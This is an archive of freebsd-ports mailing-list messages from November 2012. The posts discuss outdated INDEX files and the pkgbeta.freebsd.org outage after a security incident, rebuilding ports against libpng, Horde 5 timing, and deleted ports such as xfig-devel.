In-Reply-To: References: Date: Wed, 28 Nov 2012 06:34:18 +0200 Message-ID: Subject: Re: ports/173593 From: Kimmo Paasiala To: Eitan Adler Content-Type: text/plain; charset=UTF-8 Cc: freebsd-ports@freebsd.org X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 28 Nov 2012 04:34:19 -0000 On Wed, Nov 28, 2012 at 5:04 AM, Eitan Adler wrote: > On 27 November 2012 21:20, Kimmo Paasiala wrote: >> Hello, >> >> Could someone with commit rights commit a fix to audio/firefly? The PR >> is ports/173593. > > done > -- > Eitan Adler Thank you! -Kimmo From owner-freebsd-ports@FreeBSD.ORG Wed Nov 28 07:37:03 2012 Return-Path: Delivered-To: freebsd-ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id F36F7E21 for ; Wed, 28 Nov 2012 07:37:02 +0000 (UTC) (envelope-from erwin@mail.droso.net) Received: from mail.droso.net (grizzly.droso.dk [78.46.50.170]) by mx1.freebsd.org (Postfix) with ESMTP id AD0388FC0C for ; Wed, 28 Nov 2012 07:37:02 +0000 (UTC) Received: by mail.droso.net (Postfix, from userid 1001) id 6DE3D3D9; Wed, 28 Nov 2012 08:36:55 +0100 (CET) Date: Wed, 28 Nov 2012 08:36:55 +0100 From: Erwin Lansing To: Kevin Oberman Subject: Re: INDEX files on servers outdated Message-ID: <20121128073655.GL4474@droso.net> References: MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Disposition: inline In-Reply-To: X-Operating-System: FreeBSD/amd64 9.0-RELEASE User-Agent: Mutt/1.5.21 (2010-09-15) Cc: Warren Block , freebsd-ports@freebsd.org X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 28 Nov 2012 07:37:03 -0000 On Tue, Nov 27, 2012 at 03:13:40PM -0800, Kevin Oberman wrote: > On Tue, Nov 27, 2012 at 12:31 PM, Warren Block wrote: > > The INDEX files on the FreeBSD servers are outdated. > > > > (on 9-stable, amd64) > > > > # svn up /usr/ports > > # cd /usr/ports > > # make fetchindex > > # grep ^firefox-1 INDEX-9 > > firefox-16.0.2,1|/usr/ports/www/firefox|/usr/local|Web browser based > > firefox-10.0.10,1|/usr/ports/www/firefox-esr|/usr/local|Web browser > > > > firefox was updated to 17.0 on November 20, almost a week ago. > > > > The old INDEX file can cause portupgrade and portmaster to not show > > available updates. > > > > Portmaster: > > > > # svn up /usr/ports > > # portmaster -L --index-only | egrep '(ew|ort) version|total install' > > ===>>> 791 total installed ports > > ===>>> There are no new versions available > > > > Portmaster does detect changes if --index-only is left out, but it takes > > much longer and so is not used by some users. > > > > Portupgrade: > > > > # portsdb -Fu && portversion -vl'<' > > # > > > > There is no indication to the user that the index file is outdated and > > should be rebuilt locally. (I think but have not verified that the index > > file retrieved by portsnap is correct.) > > > > I started to enter a PR for this, but realized it may be a known problem. > > If so, can we just delete the index files so fetchindex errors out instead > > of delivering an outdated file? > > Looks like fall-out from the security incident. I hope they start > being updated, but I am falling back to "portsdb -Uu" or "make -C > /usr/ports index" to generate the index file. Not ideal and rather > slow, but it works. > It is. Unfortunatly, the servers used for all ports related things, including package building, but also INDEX updating, are still down. Erwin -- Erwin Lansing http://droso.dk erwin@FreeBSD.org http:// www.FreeBSD.org From owner-freebsd-ports@FreeBSD.ORG Wed Nov 28 07:43:27 2012 Return-Path: Delivered-To: ports@FreeBSD.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 4019BCC; Wed, 28 Nov 2012 07:43:27 +0000 (UTC) (envelope-from thierry@pompo.net) Received: from mx1b.lautre.net (mx1b.lautre.net [80.67.160.72]) by mx1.freebsd.org (Postfix) with ESMTP id EE2608FC08; Wed, 28 Nov 2012 07:43:26 +0000 (UTC) Received: from graf.pompo.net (graf.pompo.net [78.225.128.39]) (using TLSv1 with cipher ADH-AES256-SHA (256/256 bits)) (No client certificate requested) (Authenticated sender: thierry@pompo.net) by mx1b.lautre.net (Postfix) with ESMTPSA id 0DF247E02F; Wed, 28 Nov 2012 08:43:25 +0100 (CET) Received: by graf.pompo.net (Postfix, from userid 1001) id 3BF1B1149A; Wed, 28 Nov 2012 08:43:22 +0100 (CET) Date: Wed, 28 Nov 2012 08:43:22 +0100 From: Thierry Thomas To: horde@FreeBSD.org, ports@FreeBSD.org Subject: Re: FreeBSD Port: horde-4.0.15 Message-ID: <20121128074322.GB47515@graf.pompo.net> Mail-Followup-To: horde@FreeBSD.org, ports@FreeBSD.org References: <50B5690F.30404@ips.gov.au> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="J2SCkAp4GZ/dPZZf" Content-Disposition: inline In-Reply-To: <50B5690F.30404@ips.gov.au> User-Agent: Mutt/1.4.2.3i X-Operating-System: FreeBSD 9.1-PRERELEASE i386 Organization: Kabbale Eros X-Face: (hRbQnK~Pt7$ct`!fupO(`y_WL4^-Iwn4@ly-.,[4xC4xc; y=\ipKMNm<1J>lv@PP~7Z<.t KjAnXLs: X-PGP: 0xC71405A2 X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 28 Nov 2012 07:43:27 -0000 --J2SCkAp4GZ/dPZZf Content-Type: text/plain; charset=iso-8859-1 Content-Disposition: inline Content-Transfer-Encoding: quoted-printable Le mer 28 nov 12 =E0 2:29:51 +0100, Campbell (Freebsd support, IT HO) =E9crivait=A0: > G'Day Hello, > Is there a timeline for the Horde 5 Application Framework to be added to= =20 > the ports collection? Just wait for the end of the ports freeze, i.e. the release of 9.1. Best regards, --=20 Th. Thomas. --J2SCkAp4GZ/dPZZf Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.12 (FreeBSD) iEYEARECAAYFAlC1wJoACgkQc95pjMcUBaLOLACg4GXiXRHZx4u+ZzQ5MWX6h1pY B5IAoMwaYhdSdl666Mn4g/fqKNZE88kt =WO30 -----END PGP SIGNATURE----- --J2SCkAp4GZ/dPZZf-- From owner-freebsd-ports@FreeBSD.ORG Wed Nov 28 08:21:23 2012 Return-Path: Delivered-To: ports@FreeBSD.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 9B32BACA for ; Wed, 28 Nov 2012 08:21:23 +0000 (UTC) (envelope-from erwin@mail.droso.net) Received: from mail.droso.net (grizzly.droso.dk [78.46.50.170]) by mx1.freebsd.org (Postfix) with ESMTP id 52B9C8FC08 for ; Wed, 28 Nov 2012 08:21:23 +0000 (UTC) Received: by mail.droso.net (Postfix, from userid 1001) id 66493F40; Wed, 28 Nov 2012 09:21:22 +0100 (CET) Date: Wed, 28 Nov 2012 09:21:22 +0100 From: Erwin Lansing To: ports@FreeBSD.org Subject: [HEADSUP][PKGNG] pkgbeta.freebsd.org unavailable Message-ID: <20121128082122.GM4474@droso.net> MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Disposition: inline X-Operating-System: FreeBSD/amd64 9.0-RELEASE User-Agent: Mutt/1.5.21 (2010-09-15) X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 28 Nov 2012 08:21:24 -0000 The download site for precompiled PKGNG packages, pkgbeta.freebsd.org is currently unavailable. Due to the beta status of the project, no backups are available to restore the repository and even more unfortunate, package building infrastructure is still down after the recent security incident. Work is currently ongoing to bring the cluster infrastructure back online and we hope to have PKGNG package available again soon, though it should be noted that updating the old style packages will take priority. -- Erwin Lansing http://droso.dk erwin@FreeBSD.org http:// www.FreeBSD.org From owner-freebsd-ports@FreeBSD.ORG Wed Nov 28 08:57:27 2012 Return-Path: Delivered-To: ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 6059B4F1; Wed, 28 Nov 2012 08:57:27 +0000 (UTC) (envelope-from yerenkow@gmail.com) Received: from mail-wi0-f174.google.com (mail-wi0-f174.google.com [209.85.212.174]) by mx1.freebsd.org (Postfix) with ESMTP id B26638FC19; Wed, 28 Nov 2012 08:57:26 +0000 (UTC) Received: by mail-wi0-f174.google.com with SMTP id hm9so4491775wib.13 for ; Wed, 28 Nov 2012 00:57:25 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20120113; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :cc:content-type; bh=EQ2sLtKqlqZ3vxeFNx2RD4/KFXjr/nMhMXJ296oczJc=; b=g0uvMgWnMMSBNkF2FoBGXwANcmDYeqdAr97UJnNTCw1u8glDbcpsTYifXpzoFRuV/d N2A3Uirs4T/SOQIMh4aiEvgVA2TywUCVRvuIaq26xji5TsUeKMYEdP1qgBqnn+3N1jr4 PJk1Itirnp/rGhGicGGPRLEkEgcwUqvXY2Di150ACfgOGpyj/2EVOUcnIJZRc3hT77eP z4HGb0OJTOTR5fWCgzkBpMgShayi929eAkrYTwkh81F/1FQ9f2XZk826FZi40txMvZUe gg90SnD/BvCCWPbMxTTUMyPddgKHI39XMNC41pLhLp9lJSbrM68NFPYoHiAl+co3MApu ztbQ== MIME-Version: 1.0 Received: by 10.180.98.8 with SMTP id ee8mr3381852wib.4.1354093045611; Wed, 28 Nov 2012 00:57:25 -0800 (PST) Received: by 10.194.40.131 with HTTP; Wed, 28 Nov 2012 00:57:25 -0800 (PST) In-Reply-To: <20121128082122.GM4474@droso.net> References: <20121128082122.GM4474@droso.net> Date: Wed, 28 Nov 2012 10:57:25 +0200 Message-ID: Subject: Re: [HEADSUP][PKGNG] pkgbeta.freebsd.org unavailable From: Alexander Yerenkow To: Erwin Lansing Content-Type: text/plain; charset=ISO-8859-1 X-Content-Filtered-By: Mailman/MimeDel 2.1.14 Cc: ports@freebsd.org X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 28 Nov 2012 08:57:27 -0000 2012/11/28 Erwin Lansing > The download site for precompiled PKGNG packages, pkgbeta.freebsd.org > is currently unavailable. Due to the beta status of the project, no > backups are available to restore the repository and even more > unfortunate, package building infrastructure is still down after the > recent security incident. Work is currently ongoing to bring the > cluster infrastructure back online and we hope to have PKGNG package > available again soon, though it should be noted that updating the old > style packages will take priority. > Is this affects pkg bootstrapping too? > > -- > Erwin Lansing http://droso.dk > erwin@FreeBSD.org http:// www.FreeBSD.org > _______________________________________________ > freebsd-ports@freebsd.org mailing list > http://lists.freebsd.org/mailman/listinfo/freebsd-ports > To unsubscribe, send any mail to "freebsd-ports-unsubscribe@freebsd.org" > -- Regards, Alexander Yerenkow From owner-freebsd-ports@FreeBSD.ORG Wed Nov 28 09:56:06 2012 Return-Path: Delivered-To: freebsd-ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id E95E86B8 for ; Wed, 28 Nov 2012 09:56:05 +0000 (UTC) (envelope-from lars@e-new.0x20.net) Received: from mail.0x20.net (mail.0x20.net [IPv6:2001:aa8:fffb:1::3]) by mx1.freebsd.org (Postfix) with ESMTP id 666E88FC1C for ; Wed, 28 Nov 2012 09:56:05 +0000 (UTC) Received: from e-new.0x20.net (mail.0x20.net [IPv6:2001:aa8:fffb:1::3]) (using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits)) (No client certificate requested) by mail.0x20.net (Postfix) with ESMTPS id 93D926A6000; Wed, 28 Nov 2012 10:56:04 +0100 (CET) Received: from e-new.0x20.net (localhost [127.0.0.1]) by e-new.0x20.net (8.14.5/8.14.5) with ESMTP id qAS9u4cM057371; Wed, 28 Nov 2012 10:56:04 +0100 (CET) (envelope-from lars@e-new.0x20.net) Received: (from lars@localhost) by e-new.0x20.net (8.14.5/8.14.5/Submit) id qAS9u4Ou056709; Wed, 28 Nov 2012 10:56:04 +0100 (CET) (envelope-from lars) Date: Wed, 28 Nov 2012 10:56:04 +0100 From: Lars Engels To: ajtiM Subject: Re: opera 12.11 Message-ID: <20121128095604.GC849@e-new.0x20.net> References: <201211270534.31383.lumiwa@gmail.com> <201211271540.39268.lumiwa@gmail.com> <201211271755.45804.lumiwa@gmail.com> MIME-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="2/5bycvrmDh4d1IB" Content-Disposition: inline In-Reply-To: <201211271755.45804.lumiwa@gmail.com> X-Editor: VIM - Vi IMproved 7.3 X-Operation-System: FreeBSD 8.3-RELEASE-p4 User-Agent: Mutt/1.5.21 (2010-09-15) Cc: Peter Ulrich Kruppa , freebsd-ports@freebsd.org, Kevin Oberman X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 28 Nov 2012 09:56:06 -0000 --2/5bycvrmDh4d1IB Content-Type: text/plain; charset=utf-8 Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Tue, Nov 27, 2012 at 05:55:45PM -0600, ajtiM wrote: > On Tuesday 27 November 2012 17:24:31 Kevin Oberman wrote: > > On Tue, Nov 27, 2012 at 1:40 PM, ajtiM wrote: > > > On Tuesday 27 November 2012 08:08:45 Peter Ulrich Kruppa wrote: > > >> On 27.11.2012 12:34, ajtiM wrote: > > >> > Hi! > > >> >=20 > > >> > Update to Opera 12.11 and Opera-Linuxplugins 12.11 from 12.10 on my > > >> > FreeBSD 9.1 RC-3 doen't works anymore: > > >> >=20 > > >> > opera > > >> > libpng error: incorrect data check > > >> > libpng error: incorrect data check > > >> > libpng error: incorrect data check > > >> > Segmentation fault (core dumped) > > >>=20 > > >> It is quite a while since, but did you update your graphics/png > > >> properly? Please check /usr/ports/UPDATING 20120531 . > > >>=20 > > >> Greetings > > >>=20 > > >> Peter > > >>=20 > > >> > Thanks in advance. > > >> >=20 > > >> > P.S. > > >> >=20 > > >> > I used Clang to build Opera. > > >> >=20 > > >> > Mitja > > >> > -------- > > >> > http://www.redbubble.com/people/lumiwa > > >> > _______________________________________________ > > >> > freebsd-ports@freebsd.org mailing list > > >> > http://lists.freebsd.org/mailman/listinfo/freebsd-ports > > >> > To unsubscribe, send any mail to > > >> > "freebsd-ports-unsubscribe@freebsd.org" > > >>=20 > > >> _______________________________________________ > > >> freebsd-ports@freebsd.org mailing list > > >> http://lists.freebsd.org/mailman/listinfo/freebsd-ports > > >> To unsubscribe, send any mail to "freebsd-ports-unsubscribe@freebsd.= org" > > >=20 > > > As I remember I did portmaster -r png- and it build one day.... > > >=20 > > > Opera 12.10 and before didn't have problems... > >=20 > > Try "pkg_libchk -o". If you don't have it, install > > sysutils/bsdadminscripts. It can save a LOT of time over portmaster -r > > as many ports that will be re-installed with portmaster are dependent > > on other ports that use png, but don't use it directly, so don't need > > to be re-built. In many cases only about 10% of the ports that > > "depend" on some library actually link to the sharable, though png is > > linked to far more things than most. > >=20 > > An occasional run will also catch oversights, like missing an UPDATING > > entry or having a shareable version updated, but not entered into > > UPDATING. I think it should be a part of the weekly periodic run. (I > > also think it should be in the base system.) > >=20 > > I am not sure if pkg_libchk works with pkgng. Dominic? >=20 > I am running pkg_libck -o and everything is corrup because it calls pkg_i= nfo=20 > (I use pkgng). In pkg_libchk you have to change pkg_info -> pkg info and in one place remove a parameter to pkg_* that pkg doesn't understand. -E IIRC.=20 --2/5bycvrmDh4d1IB Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.19 (FreeBSD) iEYEARECAAYFAlC137QACgkQKc512sD3afg7mQCfSRnxBSahjXJ3gzxgnJv7pxzH lZoAoJF5R+h1Vnky9elK8YHLrm+4ehd3 =ok8W -----END PGP SIGNATURE----- --2/5bycvrmDh4d1IB-- From owner-freebsd-ports@FreeBSD.ORG Wed Nov 28 10:05:36 2012 Return-Path: Delivered-To: ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 8E8DC8CB; Wed, 28 Nov 2012 10:05:36 +0000 (UTC) (envelope-from matthew@freebsd.org) Received: from smtp.infracaninophile.co.uk (smtp6.infracaninophile.co.uk [IPv6:2001:8b0:151:1:3cd3:cd67:fafa:3d78]) by mx1.freebsd.org (Postfix) with ESMTP id 19FC18FC16; Wed, 28 Nov 2012 10:05:35 +0000 (UTC) Received: from rufus.webfusion.com (mail.heartinternet.co.uk [79.170.40.31]) (authenticated bits=0) by smtp.infracaninophile.co.uk (8.14.5/8.14.5) with ESMTP id qASA5IbK072500 (version=TLSv1/SSLv3 cipher=DHE-RSA-CAMELLIA256-SHA bits=256 verify=NO); Wed, 28 Nov 2012 10:05:32 GMT (envelope-from matthew@freebsd.org) DKIM-Filter: OpenDKIM Filter v2.7.1 smtp.infracaninophile.co.uk qASA5IbK072500 Authentication-Results: smtp.infracaninophile.co.uk/qASA5IbK072500; dkim=none reason="no signature"; dkim-adsp=none (insecure policy) X-Authentication-Warning: lucid-nonsense.infracaninophile.co.uk: Host mail.heartinternet.co.uk [79.170.40.31] claimed to be rufus.webfusion.com Message-ID: <50B5E1DD.90308@freebsd.org> Date: Wed, 28 Nov 2012 10:05:17 +0000 From: Matthew Seaman User-Agent: Mozilla/5.0 (X11; FreeBSD amd64; rv:17.0) Gecko/17.0 Thunderbird/17.0 MIME-Version: 1.0 To: Alexander Yerenkow Subject: Re: [HEADSUP][PKGNG] pkgbeta.freebsd.org unavailable References: <20121128082122.GM4474@droso.net> In-Reply-To: Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit X-Virus-Scanned: clamav-milter 0.97.6 at lucid-nonsense.infracaninophile.co.uk X-Virus-Status: Clean X-Spam-Status: No, score=-1.5 required=5.0 tests=AWL,BAYES_00,SPF_SOFTFAIL autolearn=no version=3.3.2 X-Spam-Checker-Version: SpamAssassin 3.3.2 (2011-06-06) on lucid-nonsense.infracaninophile.co.uk Cc: ports@freebsd.org X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 28 Nov 2012 10:05:36 -0000 On 28/11/2012 08:57, Alexander Yerenkow wrote: > Is this affects pkg bootstrapping too? It means you cannot download a pre-compiled package for pkgng at the moment, so, yes, it affects the way /usr/sbin/pkg works. However, there's a relatively easy workaround if you have the ports installed: just compile and install ports-mgmt/pkg from source. On 10-CURRENT you'll have to temporarily modify /etc/make.conf to switch back to pkg_tools, compile and install pkg, then follow the same instructions as for setting up pkgng on other branches (edit /etc/make.conf, setup ${LOCALBASE}/etc/pkg.conf, run pkg2ng). Cheers, Matthew From owner-freebsd-ports@FreeBSD.ORG Wed Nov 28 10:14:52 2012 Return-Path: Delivered-To: ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id E26A1B33; Wed, 28 Nov 2012 10:14:52 +0000 (UTC) (envelope-from yerenkow@gmail.com) Received: from mail-wi0-f174.google.com (mail-wi0-f174.google.com [209.85.212.174]) by mx1.freebsd.org (Postfix) with ESMTP id 287D88FC15; Wed, 28 Nov 2012 10:14:51 +0000 (UTC) Received: by mail-wi0-f174.google.com with SMTP id hm9so4542663wib.13 for ; Wed, 28 Nov 2012 02:14:51 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20120113; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :cc:content-type; bh=iR1aF7QLinWieFMCP7sNnUr4zFdibPy+kjhY0wW8rLU=; b=fMg66TIntXW9NsRhW0ogd7/zf9IobL+/IOOqJnuubzvpgoxiuNirskHMJnOlFQ4af3 SaGbXOFo8R1v6KpAYY80budB+/sw9lzMFPHkyrSXtSLGmEZNsehF3xxmPUb7lhenCdS4 s951FcrIzwLMJRb1SFQD4Yh4LQoHUPYEimkSpe+I5jgpkBsZ6NGJN+wGOtjDC1rxlVUA sTQHI3EE4Xr4LSrw2k7EB+fdNlLyBrZqP48RJgfRNrj9MVHeVEB2XaykuqHn8XaPgQI2 8H8wMC3SGNu9KmUGA37m+CZoGlmcogH/12MQVwtFH8XaCy6l7e3s6Gz4HTMuPzn5eDIi zY6w== MIME-Version: 1.0 Received: by 10.216.225.232 with SMTP id z82mr6780108wep.151.1354097690989; Wed, 28 Nov 2012 02:14:50 -0800 (PST) Received: by 10.194.40.131 with HTTP; Wed, 28 Nov 2012 02:14:50 -0800 (PST) Received: by 10.194.40.131 with HTTP; Wed, 28 Nov 2012 02:14:50 -0800 (PST) In-Reply-To: <50B5E1DD.90308@freebsd.org> References: <20121128082122.GM4474@droso.net> <50B5E1DD.90308@freebsd.org> Date: Wed, 28 Nov 2012 12:14:50 +0200 Message-ID: Subject: Re: [HEADSUP][PKGNG] pkgbeta.freebsd.org unavailable From: Alexander Yerenkow To: Matthew Seaman Content-Type: text/plain; charset=ISO-8859-1 X-Content-Filtered-By: Mailman/MimeDel 2.1.14 Cc: ports@freebsd.org X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 28 Nov 2012 10:14:53 -0000 Here's proposal - how about make bootstrap pkg download elsewhere? For example some static packagesite, which will be most of time readonly. To not have such situations in future. Regards, Alexander Yerenkow From owner-freebsd-ports@FreeBSD.ORG Wed Nov 28 10:16:51 2012 Return-Path: Delivered-To: ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 90838BE7 for ; Wed, 28 Nov 2012 10:16:51 +0000 (UTC) (envelope-from erwin@FreeBSD.org) Received: from vocal.dk-hostmaster.dk (vocal.dk-hostmaster.dk [193.163.102.9]) by mx1.freebsd.org (Postfix) with ESMTP id 3ED978FC08 for ; Wed, 28 Nov 2012 10:16:51 +0000 (UTC) Received: from imap1.dkhm (imap1.dkhm [172.16.1.85]) by vocal.dk-hostmaster.dk (Postfix) with ESMTP id AE370E0085; Wed, 28 Nov 2012 11:16:49 +0100 (CET) Received: from erwin.dkhm (erwin.dkhm [172.16.1.50]) by imap1.dkhm (Postfix) with ESMTP id EE2DC38933; Wed, 28 Nov 2012 11:16:49 +0100 (CET) Mime-Version: 1.0 (Mac OS X Mail 6.2 \(1499\)) Subject: Re: [HEADSUP][PKGNG] pkgbeta.freebsd.org unavailable From: Erwin Lansing In-Reply-To: Date: Wed, 28 Nov 2012 11:16:49 +0100 Message-Id: <76A0FD83-D67C-4710-BFCF-4E42D4741133@FreeBSD.org> References: <20121128082122.GM4474@droso.net> <50B5E1DD.90308@freebsd.org> To: Alexander Yerenkow X-Mailer: Apple Mail (2.1499) Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: quoted-printable X-Content-Filtered-By: Mailman/MimeDel 2.1.14 Cc: ports@freebsd.org X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 28 Nov 2012 10:16:51 -0000 On Nov 28, 2012, at 11:14 AM, Alexander Yerenkow = wrote: > Here's proposal - how about make bootstrap pkg download elsewhere? For = example some static packagesite, which will be most of time readonly. To = not have such situations in future. >=20 >=20 Work is ongoing to get bootstrap packages available from pkgbeta, = hopefully later today. Full repository will take longer though. Erwin From owner-freebsd-ports@FreeBSD.ORG Wed Nov 28 13:43:32 2012 Return-Path: Delivered-To: freebsd-ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 93E005BB; Wed, 28 Nov 2012 13:43:32 +0000 (UTC) (envelope-from david@catwhisker.org) Received: from albert.catwhisker.org (m209-73.dsl.rawbw.com [198.144.209.73]) by mx1.freebsd.org (Postfix) with ESMTP id 4DA2A8FC08; Wed, 28 Nov 2012 13:43:31 +0000 (UTC) Received: from albert.catwhisker.org (localhost [127.0.0.1]) by albert.catwhisker.org (8.14.5/8.14.5) with ESMTP id qASDhUaH037652; Wed, 28 Nov 2012 05:43:30 -0800 (PST) (envelope-from david@albert.catwhisker.org) Received: (from david@localhost) by albert.catwhisker.org (8.14.5/8.14.5/Submit) id qASDhU0t037651; Wed, 28 Nov 2012 05:43:30 -0800 (PST) (envelope-from david) Date: Wed, 28 Nov 2012 05:43:30 -0800 From: David Wolfskill To: freebsd-ports@freebsd.org Subject: Evasive action may be needed: graphics/xfig-devel port deleted Message-ID: <20121128134330.GG2617@albert.catwhisker.org> MIME-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="rvXnmSEQm80JaX+R" Content-Disposition: inline User-Agent: Mutt/1.5.21 (2010-09-15) X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 28 Nov 2012 13:43:32 -0000 --rvXnmSEQm80JaX+R Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable I found out about this during may normal daily "portmaster -ad" run, which is one of the worst points for it to happen, as: =2E.. =3D=3D=3D>>> The graphics/xfig-devel port has been deleted: Has expired: St= able version is more recent than devel version =3D=3D=3D>>> Aborting update Terminated Script done on Wed Nov 28 04:21:13 2012 As I had actually checked /usr/ports/UPDATING (so I would know in advance of running portmaster of any evasive action I might need to take), and saw that the most recent entry was still the one for devel/git from 12 Nov, I was rather surprised (and not in a good way). After running "portmaster -o graphics/xfig graphics/xfig-devel", I was able to proceed, but I would have appreciated an UPDATING entry. There were some other ports deleted in graphics: ------------------------------------------------------------------------ r307900 | bapt | 2012-11-28 03:17:55 -0800 (Wed, 28 Nov 2012) | 14 lines 2012-11-26 ftp/mget: No more public distfiles 2012-11-26 graphics/yap: No more public distfiles 2012-11-26 games/demonquake: No more public distfiles 2012-11-26 databases/php-sqlrelay: No more public distfiles 2012-11-26 devel/fastdep: No more public distfiles 2012-11-26 graphics/svgviewer: No more public distfiles 2012-11-26 comms/garmin-utils: No more public distfiles 2012-11-26 comms/snooper: No more public distfiles 2012-11-26 graphics/xfig-devel: Stable version is more recent than devel ve= rsion 2012-11-26 irc/irchat-jp: No more public distfiles 2012-11-26 games/xcogitate: No more public distfiles Feature safe: yes ------------------------------------------------------------------------ so folks who use any of those might want to make note (and take appropriate action). Peace, david --=20 David H. Wolfskill david@catwhisker.org Taliban: Evil men with guns afraid of truth from a 14-year old girl. See http://www.catwhisker.org/~david/publickey.gpg for my public key. --rvXnmSEQm80JaX+R Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.19 (FreeBSD) iEYEARECAAYFAlC2FQIACgkQmprOCmdXAD2fnACfZk4Zvwm6mNbNnq11CEUqr4Aj 2YkAnAgned28z3A+zCm7b9KVb60dgSMI =tFGr -----END PGP SIGNATURE----- --rvXnmSEQm80JaX+R-- From owner-freebsd-ports@FreeBSD.ORG Wed Nov 28 13:47:00 2012 Return-Path: Delivered-To: freebsd-ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 64DFF689 for ; Wed, 28 Nov 2012 13:47:00 +0000 (UTC) (envelope-from lists@eitanadler.com) Received: from mail-la0-f54.google.com (mail-la0-f54.google.com [209.85.215.54]) by mx1.freebsd.org (Postfix) with ESMTP id CB6918FC0C for ; Wed, 28 Nov 2012 13:46:59 +0000 (UTC) Received: by mail-la0-f54.google.com with SMTP id j13so13033954lah.13 for ; Wed, 28 Nov 2012 05:46:58 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=eitanadler.com; s=0xdeadbeef; h=mime-version:in-reply-to:references:from:date:message-id:subject:to :cc:content-type; bh=k2OudtoPNPfh8ZZtjn9+Tsf7d1S3EVzBcZJO44WCGo0=; b=Hov3jaj0NMNMNZ+kZ7qHpB+bj8o2vdEIsfDvYW70Di0QL30dMkJoy9k6Tt10IQDnjo GINZD6QkTCGLK7zqHhvPGXhe2RGpZbAEyip/nUOLKjBLWupomzUweC4MR7oinflm58K8 yPlXrJYQCqXYVKaGvZk+4a6bDkiXRZHKYCpRk= X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=google.com; s=20120113; h=mime-version:in-reply-to:references:from:date:message-id:subject:to :cc:content-type:x-gm-message-state; bh=k2OudtoPNPfh8ZZtjn9+Tsf7d1S3EVzBcZJO44WCGo0=; 